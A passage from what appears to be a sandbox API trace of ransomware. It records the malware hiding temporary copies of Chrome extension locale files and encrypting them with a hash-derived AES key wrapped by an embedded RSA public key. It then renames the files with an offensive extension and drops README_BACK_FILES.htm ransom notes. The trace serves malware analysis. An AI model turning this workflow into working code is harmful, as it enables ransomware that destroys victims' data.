lpFindFileData=0x2b9cd48) returned 1 [0255.045] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.045] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.045] GetLastError () returned 0x0 [0255.045] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json")) returned 0x20 [0255.045] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0255.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.047] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.047] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.050] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.050] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.050] CryptHashData (hHash=0x2e18828, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.050] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.050] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.050] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.050] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10930) returned 1 [0255.051] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10930, dwCertEncodingType=0x1, pInfo=0x2990140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990178*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e189a8) returned 1 [0255.051] CryptEncrypt (in: hKey=0x2e189a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.051] CryptEncrypt (in: hKey=0x2e189a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10248*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10248*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.051] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10248*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10248*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.052] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfb, lpOverlapped=0x0) returned 1 [0255.054] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0255.054] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0255.054] CloseHandle (hObject=0x5d60) returned 1 [0255.054] CloseHandle (hObject=0x5d5c) returned 1 [0255.054] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0255.059] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0255.060] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0255.061] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0255.062] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.062] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.062] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.063] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.063] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.063] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0255.063] AreFileApisANSI () returned 1 [0255.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.063] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.064] GetFileType (hFile=0x5d50) returned 0x1 [0255.064] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.065] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.066] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.066] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.066] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.066] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.066] GetLastError () returned 0x0 [0255.066] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json")) returned 0x20 [0255.066] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json", dwFileAttributes=0x80) returned 1 [0255.067] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.068] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.069] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.070] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.073] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.073] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.073] CryptHashData (hHash=0x2e18828, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.073] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.073] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.073] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.073] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10ce8) returned 1 [0255.074] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10ce8, dwCertEncodingType=0x1, pInfo=0x298fe00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298fe30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298fe38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18a28) returned 1 [0255.074] CryptEncrypt (in: hKey=0x2e18a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.074] CryptEncrypt (in: hKey=0x2e18a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e102d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e102d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.074] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e102d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e102d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.076] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x165, lpOverlapped=0x0) returned 1 [0255.077] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x165, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0255.077] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0255.077] CloseHandle (hObject=0x5d5c) returned 1 [0255.078] CloseHandle (hObject=0x5d60) returned 1 [0255.078] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), bFailIfExists=0) returned 1 [0255.081] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json", dwFileAttributes=0x0) returned 1 [0255.082] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.gsg")) returned 1 [0255.083] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.fuck")) returned 1 [0255.085] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.085] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.085] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.085] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.085] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.085] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\readme_back_files.htm")) returned 0xffffffff [0255.085] AreFileApisANSI () returned 1 [0255.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.085] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.086] GetFileType (hFile=0x5d50) returned 0x1 [0255.086] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.088] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.088] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.089] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.090] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.090] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.090] GetLastError () returned 0x0 [0255.090] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json")) returned 0x20 [0255.090] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json", dwFileAttributes=0x80) returned 1 [0255.091] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.091] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.092] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.093] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.095] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.095] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.095] CryptHashData (hHash=0x2e18828, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.095] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.095] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, 